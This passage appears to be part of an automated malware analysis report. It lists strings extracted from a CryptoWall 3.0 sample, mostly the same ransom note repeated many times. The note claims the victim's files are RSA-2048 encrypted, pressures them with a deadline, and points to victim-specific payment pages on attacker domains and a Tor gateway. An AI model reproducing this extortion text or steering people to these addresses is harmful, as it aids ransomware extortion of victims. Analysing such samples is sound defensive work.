target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html114.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt345.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt208.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html52.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html188.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html243.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html126.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt246.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html167.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt326.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html79.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html285.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html138.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html258.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html294.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt211.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html397.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
